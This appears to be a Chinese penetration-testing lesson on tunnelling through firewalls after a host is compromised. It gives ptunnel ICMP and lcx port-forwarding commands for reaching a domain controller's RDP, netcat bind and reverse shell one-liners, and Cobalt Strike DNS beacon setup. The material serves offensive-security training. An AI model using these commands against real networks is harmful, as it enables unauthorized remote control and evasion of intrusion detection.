71 内网安全-域横向网络&传输&应用层隧道技术

必备知识点：

1.代理和隧道技术区别?

代理只是为了解决网络的访问问题，在代理之上多了个过滤的绕过，就是隧道

2.隧道技术为了解决什么?

防火墙对流量进行监控，有些协议他是放行的，这个时候可以伪装成放行协议来进行绕过，就是同样的东西以协议转换实现绕过，隧道主要是做这个用的，可以理解为单独的通道来传输之前被拦截的东西

CS、MSF无法上线，数据传输不稳定无回显，出口数据被监控，网络通信存在问题等，这些问题出现之后，就必须用到隧道技术

隧道技术通常在我们的真实红蓝对抗比赛中，蓝队会部署入侵检测系统、流量监控的东西，如果它设置上面设置了一些东西之后，可能拖一些东西的时候就会被检测到，这个时候出口数据就会向外部发，那么这个东西一旦被监控到，就会被拦截

3.隧道技术前期的必备条件?

在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截

我们已经获得控制权，但是你不能对控制的东西进行一些信息收集，或者用它上面的东西来执行

我们通过shiro反序列化漏洞，拿到了一个权限，但是那个漏洞上面有ids，它上不了线，就是它把后门用反序列化代码执行了，上不了线，就是服务端无法被控制，这个时候就属于隧道技术的应用场景

你已经取得了一些权限，但是权限不能完整的去展示给你，我们大部分会把它执行到CS和MSF上线，因为这样子就便于你去管理这台服务器或者操作

单纯的漏洞，我们要把它转换成最好理解的UI界面，控制端的程序去控制这台服务器

我们已经获得权限，但是这个权限在转接给你，你在控制的时候，有很多的不方便，但是你又想得到这个东西，或者说更方便的去操作，就会出现隧道技术帮你解决这个问题，所以它不是一种攻击方式，它只是获取到权限之后，为了更方便的去控制和传输，绕过一些防火墙的拦截，操作不会出现异常，监控各种各样的问题，它是为了解决这个事情产生的，它和代理有不一样的地方，代理只是为了解决网络的通讯问题，而他在是在它的基础上又多了一些东西

在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢? 这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。

常用的隧道技术有以下三种:

网络层: IPv6 隧道、ICMP 隧道

传输层: TCP 隧道、UDP 隧道、常规端口转发

应用层: SSH 隧道、HTTP/S 隧道、DNS 隧道

我们会从这三个层面抽一个去讲，就是隧道协议在通讯层的第几层

演示案例:

网络传输应用层检测连通性-检测

1.TCP 协议

用"瑞士军刀"--netcat

执行 nc 命令: nc <端口>

2.HTTP 协议

用"curl"工具，执行curl <IP地址:端口>命令。如果远程主机开启了相应的端口，且内网可连接外网的话，就会输出相应的端口信息

3.ICMP 协议

用"ping"命令，执行ping <IP地址/域名>

4.DNS 协议

检测DNS连通性常用的命令是"nslookup"和"dig"

nslookup 是windows自带的DNS探测命令

dig是linux系统自带的DNS探测命令

探测它的协议是否支持，能不能正常的通讯

看它的命令是不是有正常数据的回连，或者说是否支持这个协议的传输，这个协议能够向外部发送数据，向内部的探针，这个协议是正常的，那么你才能用这个隧道，所以在用隧道之前，要去探针一下对应隧道的协议是否是支持的，如果不支持你用这个隧道是没有任何意义的

有些协议测试用命令执行不行，要用工具去测试

网络层ICMP隧道Ptunnel使用-检测利用

kali2020-Target2-Target3

pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具

-p ##表示连接icmp隧道另一端的机器IP (即目标服务器）

-lp ##表示需要监听的本地tcp端口

-da ##指定需要转发的机器的IP (即目标内网某一机器的内网IP)

-dp ##指定需要转发的机器的端口 (即目标内网某一机器的内网端口)

-x ##设置连接的密码

bash 复制代码

Webserver: ./ptunnel -x xiaodi
Hacker xiaodi: ./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的3389请求数据给本地1080
Hacker xiaodi: rdesktop 127.0.0.1 1080

老版本介绍: https://github.com/flvefour/ptunnel (需自行编译)

新版本介绍: https://github.com/esrrhs/pingtunnel (二次开发版)

通过web主机，实现对dc的控制，现在DC上面有防护的策略，这个时候我们先用前期的ICMP策略是否支持，然后再去测试它

这个时候是支持ICMP协议的，我们用相关的命令去探针隧道可不可行，就是要看它数据能不能正常通讯

这个时候，我们就可以利用隧道来实现操作，用我的计算机去连接DC，已知我得到DC上面的账号密码，我希望我通过我的计算机连接到DC，很明显，我的计算机无法连接到DC的，因为不是一个网段

ptunnel是老牌的工具，我是不推荐大家使用的，大家可以去用新版本pingtunnel，pingtunnel所有的操作都是支持的，而且功能相对老版本要好一些

操作之前，我们先要判断一下隧道可不可行

因为tcp/udp/sock5协议受到了防火墙和这个工具的拦截，所以这个工具就是解决拦截的协议，把流量封装成icmp协议上面，然后进行数据的一个传输

就是webserver自己构建一个隧道，然后密码是xiaodi，等待别人连接

假如我们自己去连接它3389，走的就是3389自带的协议，但是我用pingtunnel工具实现了一个目的，它操作的流量其实走的是ICMP的一个接口

登录进去和你之前使用远程3389去连接它是一摸一样的，只是说你现在走的流量数据不在是以前这个协议走的流量数据，它走的流量数据变成了icmp的流量数据

我是在做连通性的问题，但是大家更需要理解的是这个操作不一定是连通性问题，还有一个问题，我采用的是icmp隧道协议，来实现连接它的3389，就原有的3389调用窗口去连接的话，比正常时间连接，它走的数据和icmp是两码事，它可能就是tcp数据

传输层转发隧道Portmap使用-检测,利用

bash 复制代码

windows: lcx
linux: portmap
lcx -slave 攻击IP 3131 127.0.0.1 3389 //将本地3389给攻击IP的3131
lcx -listen 3131 3333        //监听3131转发至3333

假设我现在取得DC的权限了，通过会话把lcx转换一下，把端口上的数据给到3.31的6666端口，然后把自己本地的3389端口给出去，这条命令的意思是将本地的3389数据给到3.21的6666端口，然后执行

到webserver上监听本地的6666端口，转发至7777

通过kali去连接webserver的7777

现在我登录的就是域控的服务器

这个操作属于隧道技术里面的第二层传输层，端口转发的隧道里面

传输层转发隧道Netcat使用-检测,利用,功能

Kali2020-god\webserver-god\sqlserverldc

1.双向连接反弹shell

正向:攻击连接受害

受害: nc -ldp 1234 -e /bin/sh //linux

nc -ldp 1234 -e c: windows system32\cmd.exe //windows

攻击: nc 192.168.76.132 1234 //主动连接

反向:受害连接攻击

攻击: nc -lvp 1234

受害: nc 攻击主机IP 1234 -e /bin/sh

nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe

2.多向连接反弹shell-配合转发

反向:

bash 复制代码

god\Webserver: Lcx.exe -listen 2222 3333
god\sqlserver: nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
kali或本机: nc -v 192.168.76.143 3333

正向该怎么操作呢? 实战中改怎么选择正向和反向?

3.相关netcat主要功能测试

bash 复制代码

指纹服务: nc -nv 192.168.76.143
端口扫描: nc -v -z 192.168.76.143 1-100
端口监听: nc -lvp xxxx
文件传输: nc -lp 1111 >1.txt | nc -vn xx.xx.x.x 1111 <1.txt -q 1
反弹shell:见上

nc可以和我们的攻击实时挂钩，nc最新版有-e参数，旧版没有这个参数，很多都会受限，它被称为瑞士军刀就是因为在利用的时候非常方便

我们反弹会话、反弹命令或者说操作连接，是有很多方式的，不是说单纯的CS控制端，在上面执行命令，就是有很多方法去帮助你实现控制，而且可以利用多种协议去实现，因为在实战情况下，我们会有很多协议会被封堵拦截，所以我们要掌握很多种控制协议，那样子在实战中就不会掉链子

攻击机主动连接受害者，然后受害主机就把数据给到自己的1234，然后攻击机去连接它

攻击主机监听自己的1234，然后受害主机就主动的把数据发给攻击机

根据网络情况选择是用正向还是反向，比如受害主机能够找到你，你就用反向，受害主机找不到你，你就用正向

在webserver上监听自己的2222端口给到自己的3333端口

主动把自己的cmd给到3.31的2222端口

kali连接webserver上的另外一个接口，76网段3333，直接反弹个cmd出来

这就是个典型的端口反弹计划

nc走的是tcp协议，也就是说对方没有过滤这个TCP协议的话，这个时候可以用nc实现与控制主机的通讯，来实现控制，但是利用nc工具也只能反弹个cmd，并不能看到图形化的界面，也不能对它的东西进行操作，到时候还是要利用一些木马来实现控制，配合进行操作

nc是在linux和windows上通用的工具，它还可以进行指纹服务、端口扫描、端口监听、文件传输、反弹shell

nc具体参数的含义你可以去网上看一下具体的含义，nc是一款非常好用的内网工具，配合lcx端口转发能实现很多操作

应用层DNS隧道配合CS上线-检测,利用,说明

当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀

1.云主机Teamserver配置端门53启用-udp

2.买一个域名修改解析记录如下：

A记录->cs主机名->CS服务器IP

NS记录->ns1主机名->上个A记录地址

NS记录->ns2主机名->上个A记录地址

3.配置DNS监听器内容如下：

ns1.xiaodi8.com

ns2.xiaodi8.com

cs.xiaodi8.com

4生成后门执行上线后启用命令

bash 复制代码

beacon> checkin[*]
Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home， sent: 8 bytes
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 53 bytes
[+] received output:

应用层是在实战中经常会遇到的问题，之前两个层面可能会经常被防火墙拦截，网络层、传输层

监听器就是管道、隧道的意思，它这个木马在实现控制的时候，我们常见的就是用http生成，假设说http协议，对方是流量监控的，就是说防火墙上面有检测HTTP的，数据在HTTP协议上面传输数据的时候，它会被监控，假设说你现在用beacon http生成的后门，然后上线，那肯定会有问题，因为它已经封堵HTTP了，你流量数据还是采用它进行传递，那么你生成的后门还是绑定HTTP协议，这个时候肯定有问题

有时候我们用CS生成后门，上不了线的原因，其中就有这个情况，我们生成后门不是要绑定监听器，我们用监听器绑定HTTP协议的，那么它就相当于走的是HTTP协议的，那么生成的后门就是走这个协议

防火墙会选择性拦截的，它如果拦截HTTP的话，那你就走其它协议，直接上线

常规都是使用HTTP，因为你用DNS你会发现它比HTTP速度要慢，没有HTTP好使，因为好使的话，它在你创建监听器的话，它就不会默认给到你HTTP，因为HTTP速度最快，最好使，但是如果它被封堵了，那你就只能选择其它协议，同样的道理，如果DNS封堵，你就走HTTPS或者其它的协议，像这些都是官方自带的协议走法，你从网站下载CS的插件之后，你这边还可以多加几个协议出来

dns为域名解析用的，通过域名还原成IP，这种协议一般不会被防火墙或者其它东西拦截，因为它这个是很正常的功能，只是说这上面会走些数据，dns协议能很好处理那些不能上线的情况，就相当于数据通过DNS协议把数据给给出去，就不会受到防护软件的拦截

用阿里云的服务器老是有端口的拦截，你需要在安全组配置一下

修改域名解析记录

配置DNS监听器内容

这个时候就生成后门，选择DNS上线

上传到webserver执行

一定要注意dns上线就是这么个情况，DNS上线有个问题，就是速度特别慢，dns有个过程，就是它发送数据会有个发送和响应的过程，就好比你去ping一个网站域名，它会响应一个IP地址，它不是说是实时的，不是说传过去，它就回给你，它这个就相当于你发过去，对方在回你，而不是说你发过去就完了，于此同时你还要实现几条命令，才能实现控制

建立类似的通道

DNS上线，它的利用是建立这种有防火墙的时候，就是这个主机在防火墙里面，它可以通过控制主机

这个大概要等个10s、20s，它主要是看主机和DNS服务器通讯的速度问题

速度太慢了，它好处很多，坏处也很多，电脑主机上面有闪电，表示说他上面是有些防护的

隧道的意义是，你打之前，你对它进行测试的时候，你采用的测试方法和协议不一样，那个协议在测试的过程中有可能被拦截的，那么被拦截的话，就需要换一种方法去测试它

比如说它上面有个网站，它的网站是HTTP协议，假如说你知道这个网站有漏洞，但是你攻击不了它，因为你访问它老断断续续，突然间崩了或者怎么样，直接访问不到，原因就是很简单，要么对方禁止你的IP访问，或者说检测到你访问有异常，那这个时候你直接用工具去扫描，去搞的话，你走的通通是我们常说的HTTP协议，所以我们可以把这个协议换成其它协议去封装，就是走其它协议来实现攻击，就是以前通讯走的协议，可以通过隧道之后，可以变换另外一种协议，就跟CS上线一个道理，之前你都是HTTP协议上线的，然后HTTP协议上线不了，你就可以换一种DNS协议，而且网上还有插件，插件里面还可以帮我们多加几个，我们在对抗中，经常用到CS，东西都是属于协议方面的东西，都是为解决通讯上面被拦截的情况